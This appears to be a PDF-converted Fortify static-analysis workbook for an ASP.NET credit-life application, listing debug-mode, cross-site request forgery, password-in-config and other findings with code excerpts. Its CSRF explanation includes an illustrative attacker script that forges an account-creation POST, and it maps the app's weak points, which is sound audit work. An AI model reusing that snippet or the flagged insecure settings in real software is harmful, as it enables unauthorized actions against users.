CLS DeveloperWorkbook

HPE Security Fortify Audit Workbench
Developer Workbook
20181005_CLS
Table of Contents
Executive Summary
Project Description
Issue Breakdown by Fortify Categories
Results Outline
Oct 5, 2018, 5:40 PM 2

© Copyright 2016 Hewlett Packard Enterprise Development LP
Executive Summary
This workbook is intended to provide all necessary details and information for a developer to understand and
remediate the different issues discovered during the 20181005_CLS project audit. The information contained
in this workbook is targeted at project managers and developers.
This section provides an overview of the issues uncovered during analysis.
Project Name: 20181005_CLS Issues by Priority

Project Version:
SCA: Results Present 14 0
High Critical
WebInspect: Results Not Present
Impact
SecurityScope: Results Not Present
110 4
Other: Results Not Present Low Medium
Likelihood
Oct 5, 2018, 5:40 PM 3

Project Description
This section provides an overview of the HPE Security Fortify scan engines used for this project, as well as
the project meta-information.
SCA
Date of Last Analysis: Oct 5, 2018, 5:38 PM Engine Version: 17.10.0156

Host Name: JKIFORTW001 Certification: NOT PRESENT
Number of Files: 1,122 Lines of Code: 155,997
Oct 5, 2018, 5:40 PM 4

Issue Breakdown by Fortify Categories
The following table depicts a summary of all issues grouped vertically by Fortify Category. For each category,
the total number of issues is shown by Fortify Priority Order, including information about the number of
audited issues.
Category Fortify Priority (audited/total) Total
Critical High Medium Low Issues
ASP.NET Misconfiguration: Debug Information 0 0 0/3 0 0/3
Cross-Site Request Forgery 0 0 0 0 / 71 0 / 71
Dead Code: Unused Field 0 0 0 0/6 0/6
Dead Code: Unused Method 0 0 0 0/1 0/1
Denial of Service 0 0 0 0/1 0/1
HTML5: MIME Sniffing 0 0 0/1 0 0/1
Hidden Field 0 0 0 0/5 0/5
Insecure Randomness 0 0/1 0 0 0/1
JavaScript Hijacking 0 0 0 0/1 0/1
JavaScript Hijacking: Vulnerable Framework 0 0 0 0 / 19 0 / 19
Password Management: Password in Comment 0 0 0 0/2 0/2
Password Management: Password in Configuration File 0 0/4 0 0 0/4
Poor Error Handling: Empty Catch Block 0 0 0 0/4 0/4
Potentially Banned License: Creative Commons 0 0/1 0 0 0/1
Potentially Banned License: GPL 0 0/8 0 0 0/8
Oct 5, 2018, 5:40 PM 5

Results Outline
ASP.NET Misconfiguration: Debug Information (3 issues)
Abstract
Debugging messages help attackers learn about the system and plan a form of attack.
Explanation
ASP .NET applications can be configured to produce debug binaries. These binaries give detailed
debugging messages and should not be used in production environments. The debug attribute of the tag
defines whether compiled binaries should include debugging information.
The use of debug binaries causes an application to provide as much information about itself as possible to
the user. Debug binaries are meant to be used in a development or testing environment and can pose a
security risk if they are deployed to production. Attackers may leverage the additional information they gain
from debugging output to mount attacks targeted on the framework, database, or other resources used by
the application.
Recommendation
Always compile production binaries without debug enabled. This can be accomplished by setting the debug
attribute to false on the tag in your application's configuration file, as follows:
<configuration>
<compilation debug="false">
...
</compilation>
...
</configuration>
Setting the debug attribute to false is necessary for creating a secure application. However, it is
important that your application does not leak important system information in other ways. Ensure that your
code does not unnecessarily expose system information that could be useful to an attacker.
Issue Summary
Oct 5, 2018, 5:40 PM 6

Engine Breakdown
SCA WebInspect SecurityScope Total
ASP.NET Misconfiguration: Debug Information 3 0 0 3
Total 3 0 0 3
ASP.NET Misconfiguration: Debug Information Medium

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Web.config, line 33
Medium
(ASP.NET Misconfiguration: Debug Information)
Issue Details
Kingdom: Environment
Scan Engine: SCA (Configuration)
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Web.config:33
Taint Flags:
30 </system.Web>
31 -->
32 <system.web>
33 <compilation debug="true" targetFramework="4.6.1"/>
34 <httpCookies httpOnlyCookies="true"/>
35 <httpRuntime targetFramework="4.5" maxRequestLength="1073741824"/>
36 <httpModules>
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.bin

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/bin/CLS.dll.config, line
Medium
33 (ASP.NET Misconfiguration: Debug Information)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/bin/CLS.dll.config:33
Taint Flags:
30 </system.Web>
31 -->
32 <system.web>
36 <httpModules>
Oct 5, 2018, 5:40 PM 7

ASP.NET Misconfiguration: Debug Information Medium
Package: Code.Sampoerna.Credit Life.5th Scan.
20181005_CLS.CLS.obj.Release.TransformWebConfig.original
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/
TransformWebConfig/original/Web.config, line 33 (ASP.NET Misconfiguration: Medium
Debug Information)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/TransformWebConfig/original/Web.config:33
Taint Flags:
30 </system.Web>
31 -->
32 <system.web>
36 <httpModules>
Oct 5, 2018, 5:40 PM 8

Cross-Site Request Forgery (71 issues)
Abstract
HTTP requests must contain a user-specific secret in order to prevent an attacker from making
unauthorized requests.
Explanation
A cross-site request forgery (CSRF) vulnerability occurs when:
1. A web application uses session cookies.
2. The application acts on an HTTP request without verifying that the request was made with the user's
consent.
A nonce is a cryptographic random value that is sent with a message to prevent replay attacks. If the
request does not contain a nonce that proves its provenance, the code that handles the request is
vulnerable to a CSRF attack (unless it does not change the state of the application). This means a web
application that uses session cookies has to take special precautions in order to ensure that an attacker
can't trick users into submitting bogus requests. Imagine a web application that allows administrators to
create new accounts as follows:
var req = new XMLHttpRequest();

req.open("POST", "/new_user", true);
body = addToPost(body, new_username);
body = addToPost(body, new_passwd);
req.send(body);
An attacker might set up a malicious web site that contains the following code.

req.open("POST", "http://www.example.com/new_user", true);
body = addToPost(body, "attacker");
body = addToPost(body, "haha");
req.send(body);
If an administrator for example.com visits the malicious page while she has an active session on the site,
she will unwittingly create an account for the attacker. This is a CSRF attack. It is possible because the
application does not have a way to determine the provenance of the request. Any request could be a
legitimate action chosen by the user or a faked action set up by an attacker. The attacker does not get to
see the Web page that the bogus request generates, so the attack technique is only useful for requests that
alter the state of the application.
Applications that pass the session identifier in the URL rather than as a cookie do not have CSRF problems
because there is no way for the attacker to access the session identifier and include it as part of the bogus
request.
CSRF is entry number five on the 2007 OWASP Top 10 list.
Oct 5, 2018, 5:40 PM 9

Recommendation
Applications that use session cookies must include some piece of information in every form post that the
back-end code can use to validate the provenance of the request. One way to do that is to include a
random request identifier or nonce, like this:
RequestBuilder rb = new RequestBuilder(RequestBuilder.POST, "/new_user");

body = addToPost(body, new_username);
body = addToPost(body, new_passwd);
body = addToPost(body, request_id);
rb.sendRequest(body, new NewAccountCallback(callback));
Then the back-end logic can validate the request identifier before processing the rest of the form data.
When possible, the request identifier should be unique to each server request rather than shared across
every request for a particular session. As with session identifiers, the harder it is for an attacker to guess
the request identifier, the harder it is to conduct a successful CSRF attack. The token should not be easily
guessed and it should be protected in the same way that session tokens are protected, such as using
SSLv3.
Additional mitigation techniques include:
Framework protection: Most modern web application frameworks embed CSRF protection and they will
automatically include and verify CSRF tokens.
Use a Challenge-Response control: Forcing the customer to respond to a challenge sent by the server is
a strong defense against CSRF. Some of the challenges that can be used for this purpose are:
CAPTCHAs, password re-authentication and one-time tokens.
Check HTTP Referer/Origin headers: An attacker won't be able to spoof these headers while performing
a CSRF attack. This makes these headers a useful method to prevent CSRF attacks.
Double-submit Session Cookie: Sending the session ID Cookie as a hidden form value in addition to the
actual session ID Cookie is a good protection against CSRF attacks. The server will check both values and
make sure they are identical before processing the rest of the form data. If an attacker submits a form in
behalf of a user, he won't be able to modify the session ID cookie value as per the same-origin-policy.
Limit Session Lifetime: When accessing protected resources using a CSRF attack, the attack will only be
valid as long as the session ID sent as part of the attack is still valid on the server. Limiting the Session
lifetime will reduce the probability of a successful attack.
The techniques described here can be defeated with XSS attacks. Effective CSRF mitigation includes XSS
mitigation techniques.
Issue Summary
Oct 5, 2018, 5:40 PM 10

Engine Breakdown
Cross-Site Request Forgery 71 0 0 71
Total 71 0 0 71
Cross-Site Request Forgery Low

20181005_CLS.CLS.Areas.Administration.Views.Approval
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/
Low
Views/Approval/ApprovalForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Kingdom: Encapsulation
Scan Engine: SCA (Content)
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/Approval/
ApprovalForm.cshtml:25
Taint Flags:
22 <div class="row">
23 <div class="col-md-12">
24 @Html.Partial("_StatusMessage")
25 <form class="form-horizontal" method="post" action="@Url.Action("ApprovePar", "Approval")">
26 @Html.AntiForgeryToken()
27 <div class="portlet light bordered">
28 <div class="portlet-title">

20181005_CLS.CLS.Areas.Administration.Views.ApprovalPrdct
Views/ApprovalPrdct/ApprovalPrdctForm.cshtml, line 25 (Cross-Site Request Low
Forgery)
Issue Details
Oct 5, 2018, 5:40 PM 11

20181005_CLS.CLS.Areas.Administration.Views.ApprovalPrdct
Views/ApprovalPrdct/ApprovalPrdctForm.cshtml, line 25 (Cross-Site Request Low
Forgery)
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/ApprovalPrdct/
ApprovalPrdctForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action("Approve",
"ApprovalPrdct")">

20181005_CLS.CLS.Areas.Administration.Views.ApprovalQues
Views/ApprovalQues/ApprovalQuesForm.cshtml, line 25 (Cross-Site Request Low
Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/ApprovalQues/
ApprovalQuesForm.cshtml:25
Taint Flags:
"ApprovalQues")">

20181005_CLS.CLS.Areas.Administration.Views.GenSetting
Low
Views/GenSetting/SettingForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Oct 5, 2018, 5:40 PM 12

20181005_CLS.CLS.Areas.Administration.Views.GenSetting
Low
Views/GenSetting/SettingForm.cshtml, line 25 (Cross-Site Request Forgery)
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/GenSetting/
SettingForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.setting_id <= 0) ?
"Add" : "Edit", "GenSetting")">

20181005_CLS.CLS.Areas.Administration.Views.Menu
Low
Views/Menu/Tree.cshtml, line 24 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/Menu/Tree.cshtml:24
Taint Flags:
21 <div class="page-title"></div>
24 <form class="form-horizontal" name="frmMenuTree" method="post"
action="@Url.Action("SaveTree", "Menu")">
25 <textarea id="nestable_list_1_output" name="nestable_list_1_output" class="form-control
col-md-12 margin-bottom-10;" style="display:none;"></textarea>
26
27

Low
Views/Menu/MenuForm.cshtml, line 26 (Cross-Site Request Forgery)
Issue Details
Oct 5, 2018, 5:40 PM 13

20181005_CLS.CLS.Areas.Administration.Views.Menu
Views/Menu/MenuForm.cshtml, line 26 (Cross-Site Request Forgery) Low
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/Menu/MenuForm.cshtml:26
Taint Flags:
26 <form class="form-horizontal" method="post" action="@Url.Action((Model.menu_id <= 0) ?
"Add" : "Edit", "Menu")">

20181005_CLS.CLS.Areas.Administration.Views.Param
Low
Views/Param/ParamForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/Param/ParamForm.cshtml:
25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.param_id <= 0) ?
"Add" : "Edit", "Param")">

20181005_CLS.CLS.Areas.Administration.Views.ParamGroup
Views/ParamGroup/ParamGroupForm.cshtml, line 25 (Cross-Site Request Low
Forgery)
Issue Details
Oct 5, 2018, 5:40 PM 14

20181005_CLS.CLS.Areas.Administration.Views.ParamGroup
Views/ParamGroup/ParamGroupForm.cshtml, line 25 (Cross-Site Request Low
Forgery)
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/ParamGroup/
ParamGroupForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.paramgroup_id <=
0) ? "Add" : "Edit", "ParamGroup")">

Low
Views/ParamGroup/Index.cshtml, line 36 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/ParamGroup/Index.cshtml:
36
Taint Flags:
33 <div class="tools"></div>
34 </div>
35 <div class="portlet-body form">
36 <form class="form-horizontal" action="@Url.Action("Index", "paramgroup")" method="post">
38 <div class="form-body">

20181005_CLS.CLS.Areas.Administration.Views.User
Low
Views/User/Index.cshtml, line 36 (Cross-Site Request Forgery)
Issue Details
Oct 5, 2018, 5:40 PM 15

20181005_CLS.CLS.Areas.Administration.Views.User
Low
Views/User/Index.cshtml, line 36 (Cross-Site Request Forgery)
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/User/Index.cshtml:36
Taint Flags:
34 </div>
36 <form class="form-horizontal" action="@Url.Action("Index", "User")" method="post">

Low
Views/User/UserForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/User/UserForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.user_id <= 0) ?
"Add" : "Edit", "User")">

20181005_CLS.CLS.Areas.Administration.Views.UserGroup
Low
Views/UserGroup/UGPermission.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
Oct 5, 2018, 5:40 PM 16

20181005_CLS.CLS.Areas.Administration.Views.UserGroup
Low
Views/UserGroup/UGPermission.cshtml, line 25 (Cross-Site Request Forgery)
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/UserGroup/

UGPermission.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action("Permission",
"usergroup")">
26 <div class="portlet box red">
28 <div class="caption"><i class="fa fa-cogs"></i> Usergroup Permission</div>

Low
Views/UserGroup/UserGroupForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Views/UserGroup/
UserGroupForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.usergroup_id <=
0) ? "Add" : "Edit", "UserGroup")">
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.BMI

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/
Low
BMI/BMIForm.cshtml, line 22 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/BMI/BMIForm.cshtml:22
Taint Flags:
Oct 5, 2018, 5:40 PM 17

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.BMI
Low
BMI/BMIForm.cshtml, line 22 (Cross-Site Request Forgery)
22 <form class="form-horizontal" method="post" action="@Url.Action((Model.bmi_id <= 0) ?
"Add" : "Edit", "BMI")">

Low
BMI/Index.cshtml, line 36 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/BMI/Index.cshtml:36
Taint Flags:
34 </div>
36 <form class="form-horizontal" action="@Url.Action("Index", "BMI")" method="post">
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.CutOff

Low
CutOff/CutOffForm.cshtml, line 24 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/CutOff/CutOffForm.cshtml:24
Taint Flags:
24 <form class="form-horizontal" method="post" action="@Url.Action((Model.cutoff_id <= 0) ?
"Add" : "Edit", "CutOff")">
Oct 5, 2018, 5:40 PM 18

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.CutOff
Low
CutOff/CutOffForm.cshtml, line 24 (Cross-Site Request Forgery)
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Group

Low
Group/GroupForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/Group/GroupForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.question_group_id
<= 0) ? "Add" : "Edit", "Group")">
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.MP

Low
MP/MPForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/MP/MPForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.mp_id <= 0) ?
"Add" : "Edit", "MP")">
Oct 5, 2018, 5:40 PM 19

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.MP
Low
MP/MPForm.cshtml, line 25 (Cross-Site Request Forgery)
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Partner

Low
Partner/PartnerForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/Partner/PartnerForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" id="commentForm"
action="@Url.Action((Model.partner_id <= 0) ? "Add" : "Edit", "Partner")">
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Product

Low
Product/ProductForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/Product/ProductForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.product_id ==
null) ? "Add" : "Edit", "Product")">
Oct 5, 2018, 5:40 PM 20

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Question
Low
Question/QuestionForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/Question/QuestionForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.question_id ==
null) ? "Add" : "Edit", "Question")">

20181005_CLS.CLS.Areas.Master.Views.QuestionDoc
Low
QuestionDoc/QuestionDocForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/QuestionDoc/
QuestionDocForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.document_id <= 0) ?
"Add" : "Edit", "QuestionDoc")" id="QuestionDoc" enctype="multipart/form-data">

20181005_CLS.CLS.Areas.Master.Views.QuestionGroup
Low
QuestionGroup/QuestionGroupForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Oct 5, 2018, 5:40 PM 21

20181005_CLS.CLS.Areas.Master.Views.QuestionGroup
Low
QuestionGroup/QuestionGroupForm.cshtml, line 25 (Cross-Site Request Forgery)
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/QuestionGroup/
QuestionGroupForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.question_mapping_id
<= 0) ? "Add" : "Edit", "QuestionGroup")">

20181005_CLS.CLS.Areas.Master.Views.QuestionRelation
QuestionRelation/QuestionRelationForm.cshtml, line 25 (Cross-Site Request Low
Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/QuestionRelation/
QuestionRelationForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post"
action="@Url.Action((Model.question_relation_id <= 0) ? "Add" : "Edit", "QuestionRelation")">
Oct 5, 2018, 5:40 PM 22

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Rate
Low
Rate/RateForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/Rate/RateForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" id="MRate" action="@Url.Action((Model.rate_id
<= 0) ? "Add" : "Edit", "Rate")">

20181005_CLS.CLS.Areas.Master.Views.SubQuestion
Low
SubQuestion/SubQuestionForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/SubQuestion/
SubQuestionForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.sub_question_id ==
null) ? "Add" : "Edit", "SubQuestion")">
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Sumins

Low
Sumins/SIAForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Oct 5, 2018, 5:40 PM 23

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Master.Views.Sumins
Low
Sumins/SIAForm.cshtml, line 25 (Cross-Site Request Forgery)
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Master/Views/Sumins/SIAForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.id <= 0) ? "Add" :
"Edit", "Sumins")">
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Areas.Reg.Views.Registration

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Reg/Views/
Low
Registration/Index.cshtml, line 37 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Reg/Views/Registration/Index.cshtml:37
Taint Flags:
35 </div>
37 <form class="form-horizontal" action="@Url.Action("Index", ViewBag.uri)" method="post">

20181005_CLS.CLS.Areas.Underwriting.Views.PostFilter
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Underwriting/
Low
Views/PostFilter/PostFilterForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Oct 5, 2018, 5:40 PM 24

20181005_CLS.CLS.Areas.Underwriting.Views.PostFilter
Low
Views/PostFilter/PostFilterForm.cshtml, line 25 (Cross-Site Request Forgery)
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Underwriting/Views/PostFilter/
PostFilterForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action("Edit", "PostFilter")">

Low
Views/PostFilter/Index.cshtml, line 36 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Underwriting/Views/PostFilter/Index.cshtml:36
Taint Flags:
34 </div>
36 <form class="form-horizontal" action="@Url.Action("Index", "postfilter")" method="post">
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Views.Shared.Registration

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Views/Shared/
Low
Registration/ShrdNotesForm.cshtml, line 49 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Views/Shared/Registration/ShrdNotesForm.cshtml:49
Taint Flags:
46 }
Oct 5, 2018, 5:40 PM 25

Low
Registration/ShrdNotesForm.cshtml, line 49 (Cross-Site Request Forgery)
47 if (ViewBag.uri == "Assessment" && ViewBag.LockForm == false)
48 {
49 <form class="form-horizontal" method="post" action="@Url.Action("ViewReg", ViewBag.uri)">
51 <div class="chat-form">
52 <div class="input-cont">

Low
Registration/ShrdIndex.cshtml, line 37 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Views/Shared/Registration/ShrdIndex.cshtml:37
Taint Flags:
35 </div>

Low
Registration/ShrdMCUForm.cshtml, line 13 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Views/Shared/Registration/ShrdMCUForm.cshtml:13
Taint Flags:
10 </div>
11 <div class="portlet-body">
13 <form action="" method="post">
16 <div class="form-group">
Oct 5, 2018, 5:40 PM 26

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.Views.UserProfile
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Views/UserProfile/
Low
Index.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Views/UserProfile/Index.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action( "Update", "UserProfile")"
id="saveFrmUser">
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.assets.global.plugins

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/
Low
respond.min.js, line 6 (Cross-Site Request Forgery)
Issue Details
Scan Engine: SCA (Structural)
Sink Details
Sink: FunctionPointerCall
Enclosing Method: v()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/respond.min.js:6
Taint Flags:
3 window.matchMedia=window.matchMedia||function(a){"use strict";var
c,d=a.documentElement,e=d.firstElementChild||
d.firstChild,f=a.createElement("body"),g=a.createElement("div");return g.id="mq-
test-1",g.style.cssText="position:absolute;top:-100em",f.style.background="none",f.appendChild(g),functio
{return g.innerHTML='<style media="'+a+'"> #mq-test-1 { width: 42px; }</
style>',d.insertBefore(f,e),c=42===g.offsetWidth,d.removeChild(f),{matches:c,media:a}}}
(document);
4
5 /*! Respond.js v1.1.0: min/max-width media query polyfill. (c) Scott Jehl. MIT/GPLv2 Lic.
j.mp/respondjs */
6 (function(a){"use strict";function x(){u(!0)}var b={};if(a.respond=b,b.update=function()
{},b.mediaQueriesSupported=a.matchMedia&&a.matchMedia("only all").matches,!
b.mediaQueriesSupported){var
q,r,t,c=a.document,d=c.documentElement,e=[],f=[],g=[],h={},i=30,j=c.getElementsByTagName("head")
[0]||d,k=c.getElementsByTagName("base")[0],l=j.getElementsByTagName("link"),m=[],n=function()
{for(var b=0;l.length>b;b++){var
c=l[b],d=c.href,e=c.media,f=c.rel&&"stylesheet"===c.rel.toLowerCase();d&&f&&!
h[d]&&(c.styleSheet&&c.styleSheet.rawCssText?(p(c.styleSheet.rawCssText,d,e),h[d]=!0):(!/^([a-
Oct 5, 2018, 5:40 PM 27

Low
respond.min.js, line 6 (Cross-Site Request Forgery)
zA-Z:]*\/\/)/.test(d)&&!k||d.replace(RegExp.$1,"").split("/")
[0]===a.location.host)&&m.push({href:d,media:e}))}o()},o=function(){if(m.length){var
b=m.shift();v(b.href,function(c){p(c,b.href,b.media),h[b.href]=!0,a.setTimeout(function(){o()},
0)})}},p=function(a,b,c){var d=a.match(/@media[^\{]+\{([^\{\}]*\{[^\}\{]*\})+/
gi),g=d&&d.length||0;b=b.substring(0,b.lastIndexOf("/"));var h=function(a){return a.replace(/
(url$)['"]?([^\/$'"][^:\)'"]+)['"]?(\))/g,"$1"+b+"$2$3")},i=!g&&c;b.length&&(b
+="/"),i&&(g=1);for(var j=0;g>j;j++){var k,l,m,n;i?(k=c,f.push(h(a))):(k=d[j].match(/@media
*([^\{]+)\{([\S\s]+?)$/)&&RegExp.$1,f.push(RegExp.$2&&h(RegExp.
$2))),m=k.split(","),n=m.length;for(var o=0;n>o;o++)l=m[o],e.push({media:l.split("(")
[0].match(/(only\s+)?([a-zA-Z]+)\s?/)&&RegExp.
$2||"all",rules:f.length-1,hasquery:l.indexOf("(")>-1,minw:l.match(/$\s*min\-width\s*:
\s*(\s*[0-9\.]+)(px|em)\s*$/)&&parseFloat(RegExp.$1)+(RegExp.$2||""),maxw:l.match(/$\s*max\-
width\s*:\s*(\s*[0-9\.]+)(px|em)\s*$/)&&parseFloat(RegExp.$1)+(RegExp.$2||"")})}
u()},s=function(){var a,b=c.createElement("div"),e=c.body,f=!1;return
b.style.cssText="position:absolute;font-size:1em;width:1em",e||
(e=f=c.createElement("body"),e.style.background="none"),e.appendChild(b),d.insertBefore(e,d.firstChild),a
d.removeChild(e):e.removeChild(b),a=t=parseFloat(a)},u=function(b){var
h="clientWidth",k=d[h],m="CSS1Compat"===c.compatMode&&k||c.body[h]||
k,n={},o=l[l.length-1],p=(new Date).getTime();if(b&&q&&i>p-q)return
a.clearTimeout(r),r=a.setTimeout(u,i),void 0;q=p;for(var v in e)if(e.hasOwnProperty(v)){var
w=e[v],x=w.minw,y=w.maxw,z=null===x,A=null===y,B="em";x&&(x=parseFloat(x)*(x.indexOf(B)>-1?t||
